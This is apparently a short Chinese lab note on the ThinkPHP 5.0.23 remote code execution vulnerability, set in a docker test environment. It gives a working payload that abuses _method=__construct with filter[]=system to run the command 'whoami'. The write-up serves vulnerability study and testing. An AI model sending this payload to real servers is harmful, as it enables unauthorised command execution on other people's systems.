ThinkPHP5 5.0.23 远程代码执行漏洞
关闭其它的docker环境ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。进入目录并启动访问index.php?s=captcha_method=__construct&filter[]=system&method=get&
·
关闭其它的docker环境
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
进入目录并启动
访问
index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
更多推荐
已为社区贡献3条内容
所有评论(0)